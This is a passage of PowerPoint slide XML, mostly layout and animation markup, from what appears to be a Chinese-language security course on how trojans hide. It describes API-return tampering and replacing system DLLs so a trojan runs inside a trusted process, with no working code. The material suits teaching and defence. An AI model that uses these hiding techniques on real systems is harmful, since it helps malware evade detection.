                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>结果返回</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5327650" y="2781300"/>
            <a:ext cx="3276600" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -32704"/>
              <a:gd name="adj2" fmla="val 85662"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>替换</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>调用返回的数据，保护木马进程不被发现。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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8">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8">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8">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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="27" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="28" presetID="30" presetClass="entr" presetSubtype="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800" decel="100000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="800" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="-90"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="800" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x+0.4"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x-0.05"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="800" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-0.4"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y+0.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="200" accel="100000" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="800"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="200" accel="100000" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="800"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+0.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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="41" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="42" presetID="30" presetClass="entr" presetSubtype="0"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800" decel="100000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="800" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="-90"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="800" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x+0.4"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x-0.05"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="800" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-0.4"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y+0.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="200" accel="100000" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="800"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="200" accel="100000" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="800"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+0.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7" presetClass="entr" presetSubtype="0" fill="hold" grpId="0"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="5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animBg="1"/>
      <p:bldP spid="10" grpId="0" animBg="1"/>
      <p:bldP spid="11" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="13" grpId="0"/>
      <p:bldP spid="14" grpId="0"/>
      <p:bldP spid="15"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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）替换系统驱动或系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88067" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="634540" y="1256122"/>
            <a:ext cx="7885112" cy="5070935"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DLL (Dynamic Link Library</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，动态链接库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系统的一种可执行文件。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件没有程序逻辑，是由多个功能函数构成的，它并不能独立运行，需要由程序加载并调用。正因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件不能独立运行，所以在进程列表中并不会出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件的最简单方法是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Rundll32.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例如我们编写了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MyDll.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，这个动态链接库中定义了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>MyFunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的函数，可以通过命令执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>MyFunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>函数的功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>          Rundll32 MyDll.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>MyFunc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pP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88067">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="88067">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88067">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88067">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88067">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="88067">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88067">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88067">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="88067">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="88067">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="88067">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="88067">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="22" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="88067">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="88067">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="88067">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8806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7" grpId="0" uiExpand="1"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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）替换系统驱动或系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87046" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460324" y="1101724"/>
            <a:ext cx="7993062" cy="5210585"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>攻击者使用自己的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>文件替换掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>系统中正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>文件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>这种方法利用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系统的驱动或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，既可以启动木马，也可以隐藏木马。不使用进程，属于真隐藏技术。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>木马通过别的进程来运行它，如果这个进程是可信进程，就没有人会怀疑它是木马，那么这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>木马作为可信进程的一部分，就成为了被信赖的一部分而为所欲为</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87046">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
